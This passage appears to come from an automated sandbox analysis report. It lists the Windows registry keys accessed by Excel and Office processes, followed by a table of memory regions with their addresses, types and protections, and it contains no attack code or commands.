HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.14

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.15

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.16

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.17

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.18

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.19

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.20

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.21

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.22

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.23

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.24

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.25

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.26

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.27

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.28

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.29

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel

ETag

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel

ConfigIds

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

ClockTimeSeconds

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

TickCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile

MsaDevice

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security\Trusted Documents

LastPurgeTime

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds0

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSCategoriesSeverities

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSAllCategories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds0

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSCategoriesSeverities

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSAllCategories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel

ImmersiveWorkbookDirtySentinel

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel

ExcelPreviousSessionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common

SessionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3184

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\ShellEx\IconHandler

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile\DefaultIcon

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command

NULL

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0

FilePath

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0

StartDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0

EndDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3184

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache

LastClean

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastSyncTimeExcel

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastWriteTimeExcel

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

VersionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3184

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property

0018000DDABBE6B3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceTicket

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified

excel.exe_queried

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified

excel.exe_queried

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS

PerfMMFileName

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe

JScriptSetScriptStateStarted

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe

JScriptSetScriptStateStarted

There are 314 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7FFD34A00000

trusted library allocation

page read and write

2365A771000

trusted library allocation

page read and write

54061FB000

stack

page read and write

2365B4CC000

trusted library allocation

page read and write

18698AE0000

heap

page read and write

8F727FD000

stack

page read and write

7FFD34C20000

trusted library allocation

page read and write

7FFD34C49000

trusted library allocation

page read and write

36C7479000

stack

page read and write

7FFD348B0000

trusted library allocation

page execute and read and write

8F7293F000

stack

page read and write

1C44DB07000

heap

page execute and read and write

1C433CD0000

trusted library allocation

page read and write

18698C13000

heap

page read and write

2366A7DF000

trusted library allocation

page read and write

7FFD347B0000

trusted library allocation

page read and write

7FFD34AF0000

trusted library allocation

page read and write

1C436058000

trusted library allocation

page read and write

23672C53000

heap

page read and write

1C44597F000

trusted library allocation

page read and write

1C435920000

heap

page execute and read and write

1C435830000

trusted library allocation

page read and write

2365B34D000

trusted library allocation

page read and write

18699380000

trusted library section

page read and write

1869E0F0000

trusted library allocation

page read and write

236728CA000

heap

page read and write

236728C0000

heap

page read and write

7FFD34A60000

trusted library allocation

page read and write

2365ACE8000

trusted library allocation

page read and write

1C445978000

trusted library allocation

page read and write

23658A1D000

heap

page read and write

7FFD34C6B000

trusted library allocation

page read and write

18698CA1000

heap

page read and write

1869E22E000

heap

page read and write

2365A2E0000

heap

page read and write

7FFD34980000

trusted library allocation

page execute and read and write

36C707E000

stack

page read and write

54063FE000

unkown

page readonly

2365A7F8000

trusted library allocation

page read and write

1C44DB9A000

heap

page read and write

2365ACF2000

trusted library allocation

page read and write

1C433C90000

heap

page read and write

540767E000

stack

page read and write

2365C032000

trusted library allocation

page read and write

1C44E0D0000

heap

page read and write

23672C0C000

heap

page read and write

7FFD349D0000

trusted library allocation

page read and write

7FFD34941000

trusted library allocation

page read and write

1C4354A0000

trusted library allocation

page read and write

1C433C60000

heap

page read and write

2365B0AA000

trusted library allocation

page read and write

1C4371D4000

trusted library allocation

page read and write

1869E261000

heap

page read and write

7FFD34A40000

trusted library allocation

page read and write

18698D02000

heap

page read and write

2365A2F0000

heap

page read and write

2365ACFA000

trusted library allocation

page read and write

2365A660000

trusted library allocation

page read and write

7FFD34792000

trusted library allocation

page read and write

1869E220000

trusted library allocation

page read and write

5406DFE000

stack

page read and write

